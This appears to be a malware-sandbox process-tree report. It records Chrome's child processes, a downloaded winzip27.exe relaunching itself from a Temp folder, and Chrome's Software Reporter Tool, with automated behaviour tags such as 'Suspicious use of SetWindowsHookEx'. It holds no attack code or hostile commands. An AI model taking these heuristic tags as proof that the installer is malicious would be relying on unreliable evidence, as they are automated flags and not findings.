C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9668 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7944 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6380 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9400 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8676 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9572 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8912 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9260 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1664 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8092 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9644 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10096 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10100 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9052 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5616 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\winzip27.exe"C:\Users\Admin\Downloads\winzip27.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\e605be0\winzip27.exerun=1 shortcut="C:\Users\Admin\Downloads\winzip27.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Enumerates connected drives
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5384 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1108 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7940 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9040 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7908 /prefetch:82⤵
-
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=e/SI9iUbcZYMe4+gpT5ShKD4R4+hEtBCmzxgF/cn --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off2⤵
- Executes dropped EXE
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=107.294.200 --initial-client-data=0x27c,0x280,0x284,0x278,0x258,0x7ff686415960,0x7ff686415970,0x7ff6864159803⤵
- Executes dropped EXE
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5852_UNGYNDCKFJVWMKVD" --sandboxed-process-id=2 --init-done-notifier=748 --sandbox-mojo-pipe-token=9782502513786920353 --mojo-platform-channel-handle=724 --engine=23⤵
- Executes dropped EXE
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5852_UNGYNDCKFJVWMKVD" --sandboxed-process-id=3 --init-done-notifier=984 --sandbox-mojo-pipe-token=6466188537731863880 --mojo-platform-channel-handle=9803⤵
- Executes dropped EXE
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5004 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8092 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10116 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8376 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9180 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9376 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8124 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8252 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3304 /prefetch:82⤵
-
-
